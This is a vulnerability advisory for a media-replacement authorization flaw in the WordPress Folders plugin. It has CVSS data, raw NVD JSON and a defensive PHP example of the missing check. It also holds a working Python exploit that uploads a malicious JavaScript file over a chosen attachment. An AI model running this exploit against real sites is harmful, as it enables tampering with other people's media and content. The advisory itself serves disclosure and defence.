Security Vulnerability Report
CVE-2025-12640 CVSS 4.3 MEDIUM

CVE-2025-12640

Published: 2026-01-08 03:15:43
Last Modified: 2026-04-15 00:35:42

Description

The Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager plugin for WordPress is vulnerable to Unauthorized Arbitrary Media Replacement in all versions up to, and including, 3.1.5. This is due to missing object-level authorization checks in the handle_folders_file_upload() function. This makes it possible for authenticated attackers, with Author-level access and above, to replace arbitrary media files from the WordPress Media Library.
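The root cause named above is a missing object-level authorization check (the record's weakness entry is CWE-862, Missing Authorization): the handler apparently verified only that the caller is an authenticated user, not that the caller is allowed to modify the particular attachment being overwritten. The following hypothetical WordPress AJAX handler is an added illustration of where that check belongs; it is not the Folders plugin's code and not the 3.1.6 fix. The action name `example_replace_media`, the nonce name and the `attachment_id` parameter are constructed for this example.

```php
<?php
// Illustrative media-replacement handler (added example, not the plugin's code).
// Assumptions: AJAX action "example_replace_media", nonce field "_wpnonce",
// and POST parameter "attachment_id" are all constructed names.

// wp_ajax_{action} only fires for logged-in users, so authentication is
// already established here. Authentication is not authorization, though:
// every check below still has to be made for the specific object.
add_action( 'wp_ajax_example_replace_media', 'example_replace_media_handler' );

function example_replace_media_handler() {
    // 1. CSRF protection: the request must carry a nonce bound to this action.
    check_ajax_referer( 'example_replace_media', '_wpnonce' );

    $attachment_id = isset( $_POST['attachment_id'] ) ? absint( $_POST['attachment_id'] ) : 0;

    // 2. The target must be a real attachment, not an arbitrary post ID.
    if ( ! $attachment_id || 'attachment' !== get_post_type( $attachment_id ) ) {
        wp_send_json_error( array( 'message' => 'Invalid attachment.' ), 400 );
    }

    // 3. Object-level authorization. This is the step whose absence is CWE-862:
    //    a role or capability check alone ("can this user upload files?") says
    //    nothing about *this* attachment. current_user_can( 'edit_post', $id )
    //    goes through map_meta_cap, which for an attachment owned by someone
    //    else requires edit_others_posts, so an Author can replace only their
    //    own media while Editors and above can replace any.
    if ( ! current_user_can( 'edit_post', $attachment_id ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed to replace this file.' ), 403 );
    }

    // 4. Validate the upload before touching the filesystem.
    if ( empty( $_FILES['file'] ) || UPLOAD_ERR_OK !== $_FILES['file']['error'] ) {
        wp_send_json_error( array( 'message' => 'No file uploaded.' ), 400 );
    }
    $check = wp_check_filetype_and_ext( $_FILES['file']['tmp_name'], $_FILES['file']['name'] );
    if ( empty( $check['type'] ) ) {
        wp_send_json_error( array( 'message' => 'Disallowed file type.' ), 415 );
    }
    // A replacement keeps the attachment's URL, so it must also keep its MIME
    // type; otherwise an image that pages already embed could become a script.
    if ( $check['type'] !== get_post_mime_type( $attachment_id ) ) {
        wp_send_json_error( array( 'message' => 'Replacement must match the existing file type.' ), 415 );
    }

    // 5. Only after every check passes: overwrite the attachment's file and
    //    regenerate its metadata (sizes, dimensions) to match the new content.
    $target = get_attached_file( $attachment_id );
    if ( ! $target || ! move_uploaded_file( $_FILES['file']['tmp_name'], $target ) ) {
        wp_send_json_error( array( 'message' => 'Could not write file.' ), 500 );
    }
    require_once ABSPATH . 'wp-admin/includes/image.php';
    wp_update_attachment_metadata(
        $attachment_id,
        wp_generate_attachment_metadata( $attachment_id, $target )
    );

    wp_send_json_success( array( 'attachment_id' => $attachment_id ) );
}
```

The order matters: the nonce and the per-object capability check run before any file handling, so a request for an attachment the caller does not own is rejected with 403 without the upload ever being inspected or written.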

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Folders plugin <= 3.1.5 (all affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-12640 PoC - Unauthorized Media Replacement
# Target: WordPress Folders Plugin <= 3.1.5


def exploit_cve_2025_12640(target_url, username, password, target_attachment_id, malicious_file_path):
    """
    Exploit for CVE-2025-12640: Unauthorized Arbitrary Media Replacement

    Args:
        target_url: Target WordPress site URL
        username: WordPress user with Author-level access
        password: User password
        target_attachment_id: ID of the media file to replace
        malicious_file_path: Path to the malicious file to upload
    """
    session = requests.Session()

    # Step 1: Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    response = session.post(login_url, data=login_data, allow_redirects=True)
    if 'wordpress_logged_in' not in str(session.cookies):
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Read malicious file content
    try:
        with open(malicious_file_path, 'rb') as f:
            file_content = f.read()
    except Exception as e:
        print(f"[-] Failed to read malicious file: {e}")
        return False

    # Step 3: Exploit the vulnerability via AJAX endpoint
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Prepare the malicious file for upload
    files = {
        'file': ('malicious.js', file_content, 'application/javascript')
    }

    # Key parameter: folder_id with target attachment ID
    data = {
        'action': 'folders_handle_file_upload',
        'folder_id': target_attachment_id,  # Target attachment ID to replace
        'is_featured': '0',
        'post_id': '0'
    }

    response = session.post(ajax_url, data=data, files=files)

    if response.status_code == 200:
        if response.headers.get('content-type', '').find('json') != -1:
            result = response.json()
        else:
            result = response.text
        print("[+] Exploitation attempt completed")
        print(f"[+] Response: {result}")
        return True
    else:
        print(f"[-] Exploitation failed with status code: {response.status_code}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 6:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <attachment_id> <malicious_file>")
        print(f"Example: python {sys.argv[0]} http://target.com admin password 123 malicious.js")
        sys.exit(1)

    target_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    attachment_id = sys.argv[4]
    malicious_file = sys.argv[5]

    exploit_cve_2025_12640(target_url, username, password, attachment_id, malicious_file)
```

References

https://plugins.trac.wordpress.org/changeset/3402986/folders/tags/3.1.6/includes/media.replace.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/ac6432a4-6597-4d1e-b63d-c007a301d1b2?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12640",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-08T03:15:42.873",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager plugin for WordPress is vulnerable to Unauthorized Arbitrary Media Replacement in all versions up to, and including, 3.1.5. This is due to missing object-level authorization checks in the handle_folders_file_upload() function. This makes it possible for authenticated attackers, with Author-level access and above, to replace arbitrary media files from the WordPress Media Library."
      },
      {
        "lang": "es",
        "value": "El plugin Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager para WordPress es vulnerable a Reemplazo Arbitrario de Medios No Autorizado en todas las versiones hasta la 3.1.5, inclusive. Esto se debe a la falta de comprobaciones de autorización a nivel de objeto en la función handle_folders_file_upload(). Esto hace posible que atacantes autenticados, con acceso de nivel Autor y superior, reemplacen archivos multimedia arbitrarios de la biblioteca de medios de WordPress."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3402986/folders/tags/3.1.6/includes/media.replace.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ac6432a4-6597-4d1e-b63d-c007a301d1b2?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```